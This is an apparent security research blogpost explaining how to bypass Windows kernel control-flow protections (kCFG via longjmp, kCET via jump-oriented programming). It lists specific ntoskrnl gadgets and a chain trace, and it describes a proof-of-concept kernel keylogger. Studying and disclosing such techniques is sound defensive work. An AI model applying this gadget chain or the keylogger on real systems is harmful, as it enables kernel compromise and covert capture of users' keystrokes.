Code reuse in the age of kCET and HVCI

With the recent evolutions of the Windows kernel, multiple mitigations and hardenings have been created, to prevent arbitrary kernel code execution. First, HVCI ensures at the hypervisor level that only signed drivers can be loaded within the kernel. To prevent the allocation of new executable pages, Extended Page Tables are used - new executable pages can only be allocated with support of the hypervisor, and that requires some form of code signature.

Then, to ensure already loaded code cannot be reused, Control-Flow Integrity is enforced using two different mechanisms. kCFG is a software implementation of CFI used to protect forward edges, which relies on a bitmap of valid call targets - bitmap that is protected by the hypervisor. Backward-edges are protected using kCET, Windows support of Intel CET, a hardware implementation of a shadow stack, which protects return addresses on the stack from tampering.

All of these mechanisms are described in this blogpost, which I recommend reading.

The addition of kCET makes techniques such as KernelForge non-functionnal, which would craft a ROP chain on the stack of a dummy thread to chain arbitrary function calls.

In this blogpost, I wanted to explore whether kernel-code execution was still possible, or if data-only attacks are now the only way to go.

Breaking forward-edge integrity

While kCET seems pretty robust, kCFG is not as robust as Intel IBT, the hardware implementation of forward-edge CFI. As such, techniques like Jump-Oriented Programming (JOP) can get around kCET, but the first gadget in the chain is unlikely to be a valid call target. Therefore, we need to get around kCFG once, afterwards, it is no longer a concern during the execution of the JOP chain.

kCFG can only maintain the integrity of the control flow if every call site is instrumented. In practice however, in the Windows kernel, it is not uncommon to find unprotected calls or jumps.

To discover interesting functions which lead to unprotected call sites with attacker controlled data, I experimented with two different approaches: manually inspecting control-flow related functions, in particular functions that can modify the control-flow in unpredictable ways at compile time - exceptions and goto. The second approach was using symbolic execution with the miasm framework.

Symbolic execution

I wrote a quick script to list all valid call targets of ntoskrnl.exe, and for each function, ran the symbolic execution. Then, the execution stops when the instruction pointer cannot be solved, and logged the expression which determines the value of the instruction pointer. I filtered the results to only keep functions where the instruction pointer depended on the arguments given to the function.

This yielded some interesting results. Below I show some candidates that could be used, depending on the primitive you have:

KiDpcDispatch xors a buffer pointed by RCX with RDX, then gets the address of a kernel function, writes a value to the target address, and jumps to it. For example, the expression returned by miasm is the following: (@64[@64[RCX + 0x40] + 0x20] ^ @64[@64[RCX + 0x40] + 0x40]) | 0xFFFF800000000000.

KiDpcDispatch
xor        qword ptr [rcx + 0x48], rdx
xor        qword ptr [rcx + 0x50], rdx
add        rcx, 0x48
xor        qword ptr [rcx + 0x10], rdx
xor        qword ptr [rcx + 0x18], rdx
xor        qword ptr [rcx + 0x20], rdx
xor        qword ptr [rcx + 0x28], rdx
xor        qword ptr [rcx + 0x30], rdx
xor        qword ptr [rcx + 0x38], rdx
xor        qword ptr [rcx + 0x40], rdx
xor        qword ptr [rcx + 0x48], rdx
xor        qword ptr [rcx + 0x50], rdx
xor        qword ptr [rcx + 0x58], rdx
xor        qword ptr [rcx + 0x60], rdx
xor        qword ptr [rcx + 0x68], rdx
xor        qword ptr [rcx + 0x70], rdx
xor        qword ptr [rcx + 0x78], rdx
xor        qword ptr [rcx + 0x80], rdx
xor        qword ptr [rcx + 0x88], rdx
xor        qword ptr [rcx + 0x90], rdx
xor        qword ptr [rcx + 0x98], rdx
xor        qword ptr [rcx + 0xa0], rdx
xor        qword ptr [rcx + 0xa8], rdx
xor        qword ptr [rcx + 0xb0], rdx
xor        qword ptr [rcx + 0xb8], rdx
xor        qword ptr [rcx + 0xc0], rdx
xor        dword ptr [rcx], edx
sub        rcx, 0x48
mov        r8, qword ptr [rcx + 0x40]
mov        r10, qword ptr [r8 + 0x40]
mov        rdx, 0xffff800000000000
mov        r9, qword ptr [r8 + 0x20]
xor        r10, r9
or         r10, rdx
mov        rdx, 0x85131481131482e
mov        rcx, rdx
xor        rdx, qword ptr [r10]
mov        dword ptr [r10], ecx
mov        rcx, r10
jmp        rcx

RtlLookupFunctionEntryEx calls the value RCX + *(RCX-0x1000+0x7E8) :

RtlLookupFunctionEntryEx
xor        qword ptr cs:[rcx], rdx
xor        qword ptr [rcx + 0x8], rdx
lea        rdx, [rcx - 0x1000]
mov        eax, dword ptr [rdx + 0x7e8]
add        rax, rdx
sub        rsp, 0x28
call       rax
add        rsp, 0x28
mov        r8, qword ptr [rax + 0x110]
lea        rcx, [rax + 0x798]
mov        edx, 0x1
jmp        r8

RtlpExecuteHandlerForException simply calls the 6th argument:

RtlpExecuteHandlerForException
sub        rsp, 0x28
mov        qword ptr [rsp + 0x20], r9
mov        rax, qword ptr [r9 + 0x30]
call       rax
nop        dword ptr [rax]
nop
add        rsp ,0x28
ret

Despite having very different names, KiDpcDispatch, and RtlLookupFunctionEntryEx have something in common: they are all Patchguard functions with intentionally confusing names! :)

KiDpcDispatch is not suitable for our needs, since it requires RWX memory (in the last 3 instructions).

RtlLookupFunctionEntryEx could work, but would require carefully calculating the value in the 1st argument, so that the write operation ends up writing to writeable memory.

Finally RtlpExecuteHandlerForException redirects the control flow to the 6th parameter, with a call instruction. This can also work, depending on the primitive you have.

Overall, I think symbolic execution has a lot of potential to identify interesting functions to get around kCFG, even without much knowledge on the topic, I was quickly able to find valid candidates. My implementation was also very limited, if the function had an immediate call, the symbolic execution would stop and not recursively execute the function called - and I still had multiple candidates.

longjmp

While manually searching for interesting functions, I decided to look at the implementation of longjmp:

void longjmp(jmp_buf env, int value)
{
  KeCheckStackAndTargetAddress(env->Rip, env->Rsp);
  __longjmp_internal(env, value);
  return;
}

The __longjmp_internal function performs the actual longjmp - it restores nonvolatile registers from the env parameter and jumps to the Rip value, without any CFG check:

...
mov rax, rdx
mov rbx, qword [rcx + 8]
mov rsi, qword [rcx + 0x20]
mov rdi, qword [rcx + 0x28]
mov r12, qword [rcx + 0x30]
mov r13, qword [rcx + 0x38]
mov r14, qword [rcx + 0x40]
mov r15, qword [rcx + 0x48]
ldmxcsr dword [rcx + 0x58]
movdqa xmm6, xmmword [rcx + 0x60]
movdqa xmm7, xmmword [rcx + 0x70]
movdqa xmm8, xmmword [rcx + 0x80]
movdqa xmm9, xmmword [rcx + 0x90]
movdqa xmm10, xmmword [rcx + 0xa0]
movdqa xmm11, xmmword [rcx + 0xb0]
movdqa xmm12, xmmword [rcx + 0xc0]
movdqa xmm13, xmmword [rcx + 0xd0]
movdqa xmm14, xmmword [rcx + 0xe0]
movdqa xmm15, xmmword [rcx + 0xf0]
mov rdx, qword [rcx + 0x50]
mov rbp, qword [rcx + 0x18]
mov rsp, qword [rcx + 0x10]
jmp rdx

This would be an ideal function to call to bypass the requirements of kCFG, but __longjmp_internal is not a valid call target. However, longjmp is a valid call target, so let’s review KeCheckStackAndTargetAddress to see what constraints we have:

void KeCheckStackAndTargetAddress(size_t Rip, size_t Rsp)
{
  size_t StackLimit = 0;
  size_t StackBase = 0;
  if (Rip >= 0x8000000000000000)
  {
    BOOL success = KeQueryCurrentStackInformationEx(Rsp, unused, &StackBase, &StackLimit);
    if (((success != FALSE) && (StackBase <= Rsp)) && (Rsp < StackLimit))
      return;
  }
  __debugbreak();
}

Regarding the new RIP value, the only constraint is that it is a kernel address, so no real issue here. The new RSP value has a constraint: it must be within the bounds of the kernel stack of the current thread.

Starting with version 24H2, new restrictions on KASLR leaks are in place, which would prevent unprivileged users from getting an easy kernel stack address leak. While this can be an issue for exploiting a privilege escalation vulnerability, this isn’t a problem when targeting “admin-to-kernel” scenarios.

This makes longjmp an interesting function to call to break the forward-edge integrity enforced by kCFG, if you have control over the 1st argument, and have a stack address leak.

Crafting a JOP chain

Now that kCFG is no longer a concern, we can start reusing kernel code by jumping on a gadget in the middle of a function (or instruction), just like a standard ROP chain. The gadget cannot end in a ret, because kCET is still in place, instead, it must end on an indirect jmp or a call

Unlike ROP chains, JOP chains have an additional difficulty: there is nothing maintaining and updating the state of the execution of the chain. After the execution of a gadget, there is nothing that makes the control flow go to the next gadget. While it is possible to prepare the register used in the indirect jmp or call at the end of the gadget to branch to the next gadget directly, this doesn’t work as the chain gets bigger. This would require preparing too many registers, and create additional constraints for the gadgets themselves. Given that JOP gadgets are also less convenient than ROP gadgets, this quickly makes creating JOP chain too complex, so an alternative solution is needed.

On a ROP chain, this is implicitly done when a ret instruction is executed at the end of a ROP gadget, the control flow goes to the next gadget, and at the same time, the stack pointer gets updated and now holds the address of the following gadget.

To replicate this behavior when creating a JOP chain, one can use a “dispatcher” gadget, whose role is to link together all the pieces of the JOP chain. When the execution of any gadget completes, the execution must come back to the dispatcher gadget, which will update the state of the JOP chain, and jump to the next gadget.

This gadget is crucial, and will affect the design of the entire chain of gadgets, so finding this gadget first is a good idea.

JOP dispatchers

I identified two gadgets that could fulfill my requirements. The first one corresponds to the nt!HalpLMIdentityStub symbol:

mov edi, edi
mov rcx, qword [rdi + 0x70]
mov rax, qword [rdi + 0xa0]
mov rdi, qword [rdi + 0x78]
jmp rcx

This could work starting from the first instruction, abusing the fact that SMAP is not enabled in most contexts on Windows, or starting from the second instruction. In this dispatcher, rdi serves as the register that gets updated to hold the address of the next gadget. The downside of this gadget is that the rcx register gets clobbered with the address of our target gadgets, which is inconvenient when targeting functions with the fastcall convention, where rcx holds the first argument.

I initially started using this gadget to make a working JOP chain, and then switched to the gadget I describe below because it is more powerful - but it is clearly possible to build a JOP chain around this dispatcher.

The second gadget I found is located at the end of nt!_guard_retpoline_exit_indirect_rax:

call rax
mov rax, qword [rsp + 0x20]
mov rcx, qword [rsp + 0x28]
mov rdx, qword [rsp + 0x30]
mov r8, qword [rsp + 0x38]
mov r9, qword [rsp + 0x40]
add rsp, 0x48
jmp rax

This gadget is slightly different. This time, the register holding the address of the next gadget is rsp. If we could execute this in a loop, this would be perfect, we would call an arbitrary address, update the arguments, then jmp back to the call instruction. Unfortunately, both the jmp and call instructions use the rax register.

To get around this, we start the execution on the mov rax, qword [rsp + 0x20] instruction, prepare the arguments for our target function, then jump to a JOP gadget that can update rax without modifying other registers. I picked the following gadget: pop rax ; push rdi ; cmc ; jmp qword [rsi+0x3B] ;. Only the pop rax and jmp qword [rsi+0x3B] are relevant, but JOP gadgets are less convenient. The pop rax instruction updates rax with the value of the target function, read from the stack, and rsi is prepared beforehand so that *(rsi+0x3B) points to the call rax. With this, we can loop around this gadget, and call arbitrary addresses, while also controlling every arguments.

There is also a big upside to this gadget: it uses a call instruction, which means it is possible to execute ret-ending gadgets, just like in a ROP chain! Typical ROP gadgets, for example pop rdi ; pop rsi ; ret ; can work - rdi gets the return address pushed by the call rax instruction, rsi gets the value of interest, and the following address on the stack must be the address of the mov rax, qword [rsp + 0x20] instruction, to comply with kCET. This works because fundamentally, Intel CET checks the return value on the stack with the shadow stack, but not the address where it was originally pushed to.

With this, we can chain function calls and ROP gadgets

Saving the return value & pivoting stacks

Now, the only thing that is missing is the ability to save and reuse the return value of function calls. The return value in rax immediately gets overwritten by the mov rax, qword [rsp + 0x20] instruction of our dispatcher.

To address this issue, the call rax instruction is not going to directly call the target function, but another gadget containing another call instruction. The one I picked is the following : call rbp ; jmp qword [rsi-0x77] ;. If rbp is setup to have the address of the target function, we can gain control of the execution after the target function, where rax has not been destroyed yet.

To save rax, I used this gadget:

mov qword [rsi], rax
mov rbx, qword [rsp+0x60]
mov rsi, qword [rsp+0x68]
add rsp, 0x50
pop rdi
ret

When it returns, kCET forces the return address to be the second instruction of the JOP dispatcher, but this is fine, because the return value has been saved at *rsi.

And, to actually reuse the return value, I split the JOP each time the return value needed to be reused. This way, I could memcpy the value saved to the next part of the payload, and used a pop rsp ; ret ; gadget to switch from one part of the payload to the next.

Here is a trace to follow of the execution flow of the JOP chain.

Click to expand
mov rax, qword [rsp + 0x20] ; set arguments for function call, and rax to the address of the "pop rax" gadget
; ...
jmp rax
pop rax ; set rax to the address of the "call rbp ; jmp [rsi-0x77]" gadget 
; ...
jmp qword [rsi+0x3b] ; rsi previously set so that *(rsi+0x3b) points to the address of the "call rax" instruction in the jop dispatcher
call rax
	call rbp ; previously set to the target function
		nop ; (Start of the target function)
		; ...
		ret
	jmp qword [rsi-0x77] ; rsi previously set so that *(rsi-0x77) points to the address of the gadget used to save rax
	mov qword [rsi], rax ; return value gets saved at *rsi
	; ...
	ret
mov rax, qword [rsp + 0x20] ; start of second gadget, 
; ...
jmp rax
pop rax ; set rax to the address of "add rsp, 0x50 ; pop rbp ; ret" gadget
; ...
jmp qword [rsi+0x3b] ; rsi previously set so that *(rsi+0x3b) points to the address of the "call rax" instruction in the jop dispatcher
call rax
	add rsp, 0x50
	pop rbp ; set rbp to the address of the 2nd target function, memcpy if we want to reuse the result of the 1st function call
	ret
mov rax, qword [rsp + 0x20] ; set arguments for the 2nd function call, and rax to the address of the "pop rax" gadget
; ...
jmp rax
pop rax ; set rax to address of "call rbp ; jmp [rsi-0x77]" 
; ...
jmp qword [rsi+0x3b] ; rsi previously set so that *(rsi+0x3b) points to the address of call rax instruction in the jop dispatcher
call rax
	call rbp ; previously set to the 2nd target function
		nop ; (Start of the target function)
		; ...
		ret
	jmp qword [rsi-0x77] ; rsi previously set so that *(rsi-0x77) points to the address of the gadget used to save rax
	mov qword [rsi], rax ; return value gets saved at *rsi
	; ...
	ret
mov rax, qword [rsp + 0x20] ; start of third gadget, 
; ...

Finally, to avoid running into paging issues, where a part of the JOP chain isn’t paged in - which would result in a crash because page faults are not handled - I mapped all the parts of the payload in non-paged pool memory, using named pipes backing buffers. With this, we have the ability to reuse kernel code to call arbitrary functions and execute ROP gadgets, and save and reuse return values - without ever breaking the constraints of kCET.

With this, we have the ability to reuse kernel code to call arbitrary functions and execute ROP gadgets, and save and reuse return values - without ever breaking the constraints of kCET.

Is kernel code execution really useful ?

Now that we can achieve code execution thanks to code reuse, let’s consider when it can be useful, compared to a data-only attack.

To me, there are two main reasons where this can useful.

The first use case is executing privileged instructions, and in particular, interacting with the hypervisor and VTL1. With data-only attack, this might be done using race conditions, were the backing data of a message is replaced before being sent, but it seems harder to implement and unreliable.

The second use case is when dealing with complex data structures. For instance, in my proof of concept below, I would have to create and edit page table entries - it is much more convenient to call the corresponding API and have it do the work for you.

Finally, while this technique can get arbitrary kernel code execution, it cannot be started by a callback if none of the arguments are controlled. This makes it unsuitable for intercepting process creation notifications, for example.

Proof of concept

To demonstrate the technique, using the “admin-to-kernel” arbitrary call primitive offered by the KexecDDPlus tool, I chose to build a payload that maps the keyboard state in userland to create a keylogger, as described in the Close Encounters of the Advanced Persistent Kind presentation, with an example implementation on Windows 10. This would be tedious to implement using a data-only attack.

I happen to have a kCET compatible CPU, so using Hyper-V, I setup a Windows 11 test environment, with kCET enabled:

Windows 11 setting to enabled kCET

To start off the execution of the JOP chain, I used longjmp to get around kCFG, since the primitive offered by this ioctl gives full control over rcx.

Then, the execution of the JOP chain kicks off, the payload successively calls win32ksgd!SGDGetUserSessionState, adds a constant value to the result using a ROP gadget, to locate the map containing the state of the keyboard. Afterwards, a MDL describing the map is constructed using IoAllocateMdl, locked using MmProbeAndLockPages, and finally mapped to userland using MmMapLockedPagesSpecifyCache. Finally, the map is polled in userland to have a working keylogger.

Demonstration of the keylogger on Windows 11

My implementation is available on Github. While the offsets were created for Windows 22H2, build version 22261.4890, the most important gadgets, such as the dispatcher still exist on 24H2, and the others, while not all directly present, all have similar gadgets that could replace them.

With all this, I think its clear that kernel code execution is not dead :)